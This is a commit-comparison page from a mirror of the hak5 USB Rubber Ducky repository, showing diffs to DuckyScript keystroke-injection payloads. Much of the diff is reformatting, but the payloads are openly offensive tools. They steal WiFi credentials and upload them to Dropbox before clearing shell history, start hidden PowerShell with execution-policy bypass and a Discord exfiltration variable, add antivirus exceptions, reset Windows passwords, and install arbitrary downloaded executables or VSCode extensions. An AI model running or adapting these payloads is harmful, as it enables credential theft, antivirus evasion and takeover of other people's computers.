hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Compare commits

base: hak5:56a6b765c3d0547714040d7eab85fed7b0b0643b
Branches Tags
hak5:master
hak5:improve-duckylogger
hak5:more_extensions
hak5:add-docs
...
compare: hak5:29dbc6e43191e91ec223306b04b3e3606e9b5ca1
Branches Tags
hak5:master
hak5:improve-duckylogger
hak5:more_extensions
hak5:add-docs

24 Commits
56a6b765c3 ... 29dbc6e431

Author SHA1 Message Date
Aleff 29dbc6e431
Merge 0f1e1af17c into 675972662a 2024-09-24 21:21:00 -04:00
Peaks 675972662a
Merge pull request #484 from luu176/master 
Exfiltrate NTLM hash using DS3
 2024-09-24 19:27:52 -04:00
Luu 0df3011601
Update README.md 2024-09-25 00:23:30 +02:00
Luu a81ecd3e64
Update payload.txt 2024-09-25 00:21:49 +02:00
Luu c898ed7858
Create README.md 2024-09-25 00:20:06 +02:00
Luu 15f8f25701
Create payload.txt 2024-09-25 00:18:39 +02:00
Peaks adb9af43f8
Merge pull request #482 from aleff-github/patch-94 
Same File Name Prank
 2024-09-24 15:48:16 -04:00
Aleff 3cf199170c Update payload 2024-09-21 09:41:51 +02:00
Peaks fd272a60f4
Merge pull request #480 from aleff-github/patch-93 
Replace Links In GithubDesktop
 2024-09-20 14:03:29 -04:00
Aleff 9f1222ba05
Update payload.txt 2024-09-19 19:55:47 +02:00
Aleff d934d9d4de
removed a debug print 2024-09-18 19:31:24 +02:00
Aleff f031b928a8
Simple shifts in comments 2024-09-18 19:28:22 +02:00
Aleff bb89731ae2
Update payload.txt 2024-09-18 19:27:12 +02:00
Aleff 9c4257edbd Update README.md 2024-09-18 19:22:27 +02:00
Aleff d3e494fd12 Rename Everything Similarly 
This script, titled **Rename Everything Similarly**, is written in **DuckyScript 3.0** and designed to rename files and directories recursively on **Windows** or **Linux** systems, depending on the target environment. The script renames directories and files within a specified directory, giving them sequential and similar names.

Specifically, the ability to add a blank space to the end of the name is used. On Windows systems, if file extension viewing is not enabled the names will look identical to the human eye, while on GNU/Linux systems the difference may be more easily noticed.

![No extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/1.png?raw=true)

> How does renaming files using spaces without seeing the extension appear on windows. - To the human eye they look identical.

![With extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/2.png?raw=true)

> What it looks like instead if you turn on the extension view.
 2024-09-18 19:21:22 +02:00
Peaks 02641718a0
Merge pull request #478 from aleff-github/patch-91 
Install Any Arbitrary VSCode Extension
 2024-09-17 18:06:23 -04:00
Aleff 2c84ff499c
Update payload.txt 2024-09-17 10:23:40 +02:00
Alessandro Greco b1fae99ade Update README.md 2024-09-16 14:54:17 +02:00
Alessandro Greco 52c42dfc10 Merge branch 'patch-93' of https://github.com/aleff-github/usbrubberducky-payloads into patch-93 2024-09-16 14:43:34 +02:00
Alessandro Greco 6e3f5924c0 Update payload.txt 2024-09-16 14:43:00 +02:00
Aleff 71d5eaf378
Bug in renderer regex 
the link api.github.com needs to be correct
 2024-09-16 14:42:11 +02:00
Alessandro Greco 1fa6cea874 [+] Replace Links In GithubDesktop 
This script replaces the hardcoded GitHub links in the `renderer.js` and `main.js` files inside the GitHub Desktop application with a custom link provided by the user.
 2024-09-16 14:30:19 +02:00
Alessandro Greco 284195f4cd Install Any Arbitrary VSCode Extension 
This DuckyScript script is designed to automate the installation of any arbitrary Visual Studio Code (VSCode) extension on Windows 10. It performs the following tasks:

1. Removes any pre-existing version of the extension (if applicable).
2. Downloads a ZIP archive of a VSCode extension.
3. Extracts the extension to the correct VSCode extensions folder.

The script makes use of PowerShell to manage file paths and execute commands necessary for the installation process. The user must provide the name of the extension folder and the link to the ZIP archive containing the extension.
 2024-09-05 09:52:58 +02:00
Alessandro Greco 0f1e1af17c Several improvements in payloads 
[+] Replacements of initial delays with DETECT_READY for GNU/Linux systems and PASSIVE_WINDOWS_DETECT for Windows systems.

[+] Replacement of STRING and ENTER in STRINGLN.

[+] Use of REM_BLOCK to make the code clearer.

[+] Order DEFINE variables at the beginning following the standard #EXAMPLE procedure.

[+] Various corrections, if any.
 2024-09-02 12:25:43 +02:00
77 changed files with 3484 additions and 1154 deletions
Show Stats Expand all files Collapse all files

60
payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt
View File

@ -1,27 +1,53 @@
REM #######################################################
REM # |
REM # Title : Exfiltrate Wifi Passwords - Linux |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration, Credentials, Execution |
REM # Target : Linux |
REM # |
REM #######################################################
REM_BLOCK
#######################################################
# #
# Title : Exfiltrate Wifi Passwords - Linux #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration, Credentials, Execution #
# Target : Linux #
# #
#######################################################
END_REM
REM Requirements:
REM - Permissions
REM - Internet connection
REM - Dropbox Token
DELAY 1000
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t
DELAY 2000
REM #### PREREQUISITES SECTION ####
REM Required: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
STRING sudo su
@ -41,8 +67,6 @@ ENTER
REM #### ZIP SECTION ####
DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
@ -61,8 +85,6 @@ ENTER
REM #### WiFi && ZIP SECTION ####
REM Get all WiFi data
STRING for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do
ENTER
@ -85,8 +107,6 @@ DELAY 3000
REM #### EXFILTRATE SECTION ####
REM Set yout Dropbox folder name
DEFINE DROPBOX_FOLDER_NAME example
STRING DROPBOX_FOLDER="/
@ -105,8 +125,6 @@ ENTER
REM #### REMOVE TRACES ####
DELAY 2000
STRING history -c
ENTER

43
payloads/library/credentials/WLAN-Windows-Passwords/payload.txt
View File

@ -10,8 +10,49 @@ REM # |
REM ###################################################################
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 2000
GUI r
DELAY 250
STRING powershell -w h -ep bypass $discord='

65
payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt
View File

@ -1,24 +1,65 @@
REM ########################################################
REM # |
REM # Title : Add An Exception To Avast Antivirus |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10/11 |
REM # |
REM ########################################################
REM_BLOCK
########################################################
# #
# Title : Add An Exception To Avast Antivirus #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11 #
# #
########################################################
END_REM
REM Requirements:
REM - Avast installed and configured
REM Set the full-path that you want to set as exception
DEFINE FULL-PATH example/to/path
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Open Avast application
DELAY 2000
GUI
DELAY 1000
STRING avast

21
payloads/library/execution/Call_Someone_On_An_iPhone/payload.txt
View File

@ -1,13 +1,14 @@
REM ##############################################
REM # |
REM # Title : Call Someone On An iPhone |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : iPhone |
REM # |
REM ##############################################
REM_BLOCK
##############################################
# |
# Title : Call Someone On An iPhone |
# Author : Aleff |
# Version : 1.0 |
# Category : Execution |
# Target : iPhone |
# |
##############################################
END_REM
REM Requirements:
REM - The phone must be unlocked

20
payloads/library/execution/ChangeGitRemoteLink/payload.txt
View File

@ -1,12 +1,14 @@
REM ###########################################
REM # |
REM # Title : Change Remote Git Link |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10-11/Linux |
REM # |
REM ###########################################
REM_BLOCK
###########################################
# #
# Title : Change Remote Git Link #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10-11/Linux #
# #
###########################################
END_REM
REM Requirements:
REM - Internet Connection

53
payloads/library/execution/ChangeMacAddress_Linux/payload.txt
View File

@ -1,25 +1,50 @@
REM ###########################################
REM # |
REM # Title : Change Linux MAC Address |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ###########################################
REM_BLOCK
###########################################
# #
# Title : Change Linux MAC Address #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Linux #
# #
###########################################
END_REM
REM Requirements:
REM - Permissions
DELAY 1000
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t
DELAY 2000
REM #### PERMISSIONS SECTION ####
REM You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example

52
payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt
View File

@ -1,25 +1,49 @@
REM ###############################################
REM # |
REM # Title : Change Network Configuration |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ###############################################
REM_BLOCK
###############################################
# #
# Title : Change Network Configuration #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Linux #
# #
###############################################
END_REM
REM Requirements:
REM - Permissions
DELAY 1000
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t
DELAY 2000
REM #### PERMISSIONS SECTION ####
REM Required: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
STRING sudo su

64
payloads/library/execution/Change_Windows_User_Name/payload.txt
View File

@ -1,12 +1,14 @@
REM #############################################
REM # |
REM # Title : Change Windows User Name |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10/11 |
REM # |
REM #############################################
REM_BLOCK
#############################################
# #
# Title : Change Windows User Name #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11 #
# #
#############################################
END_REM
REM Requirements:
REM - Nothing
@ -17,8 +19,50 @@ REM - Payload tested on Windows 11 Eng
REM Set the new name that you want to set
DEFINE NEW_NAME example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Open Windows research
DELAY 2000
GUI
DELAY 1000

64
payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt
View File

@ -1,12 +1,14 @@
REM ############################################################
REM # |
REM # Title : Change the password of the Windows user |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10-11 |
REM # |
REM ############################################################
REM_BLOCK
############################################################
# #
# Title : Change the password of the Windows user #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10-11 #
# #
############################################################
END_REM
REM Requirements:
REM - Nothing (i know it's absurd)
@ -14,7 +16,49 @@ REM - Nothing (i know it's absurd)
REM You must define the new Windows user password
DEFINE NEW_PASSWORD example
DELAY 1000
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI x
DELAY 500
STRING a

2
payloads/library/execution/CloseAllApplicationsInWindows/README.md
View File

@ -1,4 +1,4 @@
# Close All Applications - BADUSB ✅
# Close All Applications
A script used to close all target open applications.

66
payloads/library/execution/CloseAllApplicationsInWindows/payload.txt
View File

@ -1,27 +1,69 @@
REM #####################################################
REM # |
REM # Title : Close All Applications |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10-11 |
REM # |
REM #####################################################
REM_BLOCK
#####################################################
# #
# Title : Close All Applications #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10-11 #
# #
#####################################################
END_REM
REM Plug-And-Play
REM
REM 1. Open a powershell
REM 2. Download a Python script
REM 3. Execute it
REM 4. Remove Python script downloaded
REM 5. Delete powershell history
REM
REM Reply with YOUR LINK. The Payload should be close_all_app.ps1
DEFINE POWERSHEL_CODE example.com
DELAY 2000
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI x
DELAY 250
DOWNARROW

49
payloads/library/execution/Defend_yourself_against_AtlasVPN_Bug-Door/payload.txt
View File

@ -1,12 +1,14 @@
REM ############################################################
REM # #
REM # Title : Defend yourself against AtlasVPN Bug-Door #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : Execution #
REM # Target : Linux #
REM # #
REM ############################################################
REM_BLOCK
############################################################
# #
# Title : Defend yourself against AtlasVPN Bug-Door #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Linux #
# #
############################################################
END_REM
REM Requirements:
REM - Administrator Permission
@ -15,7 +17,34 @@ REM - AtlasVPN installed
REM Define the sudo user password
DEFINE #SUDO-PWS example
DELAY 1000
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t
DELAY 2000

52
payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt
View File

@ -1,14 +1,14 @@
REM ################################################################
REM # |
REM # Title : Edit The Default Real App With An Arbitrary |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : GNU/Linux (Debian based tested) |
REM # |
REM ################################################################
REM_BLOCK
################################################################
# #
# Title : Edit The Default Real App With An Arbitrary #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : GNU/Linux (Debian based tested) #
# #
################################################################
END_REM
REM Requirements:
REM - sudo permissions
@ -16,11 +16,9 @@ REM - Internet connection
REM - Executable app
REM - '.desktop' file
REM Note:
REM - The Depends* time depends by the app size, the connection fast and the computer power, you should test it
REM Set the link from wich will be downloaded the zip archive
DEFINE ARBITRARY_APP_LINK example
@ -33,9 +31,35 @@ DEFINE ORIGINAL_DESKTOP_FILE_NAME example
REM sudo permissions needed
DEFINE SUDO example
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
REM Open a shell
DELAY 2000
CTRL-ALT t
DELAY 1000

53
payloads/library/execution/ExploitingAnExecutableFile/payload.txt
View File

@ -1,25 +1,50 @@
REM ################################################
REM # |
REM # Title : Exploiting An Executable File |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ################################################
REM_BLOCK
################################################
# #
# Title : Exploiting An Executable File #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Linux #
# #
################################################
END_REM
REM Requirements:
REM - Nothing, it is Plug-And-Play but you can change it as you want.
DELAY 1000
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t
DELAY 2000
REM #### Script ####
STRINGLN
function search_file {
for file in "$1"/*; do

10
payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/README.md
View File

@ -108,18 +108,12 @@ Happy Hacking!
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
</a>
<br>Instagram
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Discord
<br>Linkedin
</td>
</tr>
</table>
</div>
</div>

64
payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/payload.txt
View File

@ -1,27 +1,67 @@
REM ###########################################################################################
REM # |
REM # Title : Install And Run Any Arbitrary Executable - No Internet And Root Needed |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10/11 |
REM # |
REM ###########################################################################################
REM_BLOCK
###########################################################################################
# #
# Title : Install And Run Any Arbitrary Executable - No Internet And Root Needed #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11 #
# #
###########################################################################################
END_REM
REM Requirements:
REM - Nothing
REM Define here your hexadecimal code
DEFINE #HEX_CODE example
REM Note:
REM - Tested on Windows 11
REM - Running checked but not blocked by Avast antivirus
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 1000
STRINGLN notepad.exe

98
payloads/library/execution/Install_Any_Arbitrary_VSCode_Extension/README.md Normal file
View File

@ -0,0 +1,98 @@
# Install Any Arbitrary VSCode Extension
This DuckyScript script is designed to automate the installation of any arbitrary Visual Studio Code (VSCode) extension on Windows 10. It performs the following tasks:
1. Removes any pre-existing version of the extension (if applicable).
2. Downloads a ZIP archive of a VSCode extension.
3. Extracts the extension to the correct VSCode extensions folder.
The script makes use of PowerShell to manage file paths and execute commands necessary for the installation process. The user must provide the name of the extension folder and the link to the ZIP archive containing the extension.
## First Of All!
Installing Arbotrary Visual Studio Code (VSCode) extensions can pose cybersecurity risks because extensions, often developed by third parties, have access to critical functionalities of the editor and the operating system. A malicious extension could execute harmful code, access local files, or exfiltrate sensitive data without the user's knowledge. Additionally, if extensions are not from trusted sources or are not regularly updated, they may contain vulnerabilities that attackers can exploit, compromising the security of both the system and the entire development environment.
So...
- Before doing these tests make sure you have full permission from the owner of the computer in case it is not you.
- Always check the source and source code before doing this
- If even one line of code is not clear to you, you should not proceed at all because it takes only a little to do damage.
## Features
- Detects Windows passively through [PASSIVE_WINDOWS_DETECT](https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt) by Hak5.
- Installs a VSCode extension by downloading a ZIP file and extracting it to the correct location.
- Removes any previous version of the extension.
- Completely automated, requiring no manual intervention once the script is executed.
## Requirements
- **Target OS**: Windows 10/11
- **VSCode Path**: The script assumes that VSCode is installed in its default location. If it is installed in a different location, the paths in the script may need to be updated.
- **Compilation**: Make sure that the extension you are going to install has the out folder inside, that is, the folder that is generated as a result of compilation. Without this folder the extension cannot be loaded properly.
- **Internet Connection**: This is mandatory in case you want to download the archive from the Internet, whereas if you want to download from a server in the intranet you only need to be connected to the local network. This basically depends on the individual case....
## Usage
### DuckyScript Configuration
Before running the script, make sure to configure the following two variables in the script:
1. `#EXTENSION_NAME`: Replace this with the name of the folder where the extension will be installed.
```plaintext
DEFINE #EXTENSION_NAME example
```
Example: If the extension folder name is `DuckyScriptCookbook`, then replace `example` with `DuckyScriptCookbook`.
2. `#ARCHIVE_LINK`: Replace this with the actual URL to the ZIP file of the VSCode extension you want to install.
```plaintext
DEFINE #ARCHIVE_LINK https://example.com/path/to/archive.zip
```
### PowerShell Commands Breakdown
- **Detecting and Removing Previous Extension**: The script checks if an official version of the extension is already installed and removes it:
```powershell
$extensionsPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
if (Test-Path -Path $extensionsPath -PathType Container) {
Remove-Item -Recurse -Force -Path $extensionsPath
}
```
- **Downloading and Extracting the New Extension**: The script downloads the extension from the link provided inside a temporary folder and extracts it inside the official (the default) VSCode extensions folder:
```powershell
$url = "#ARCHIVE_LINK"
$downloadPath = "$env:TEMP\#EXTENSION_NAME.zip"
$extractPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
Invoke-WebRequest -Uri $url -OutFile $downloadPath
if (Test-Path -Path $downloadPath) {
Expand-Archive -Path $downloadPath -DestinationPath $extractPath -Force
Remove-Item -Path $downloadPath -Force
}
```
## Notes
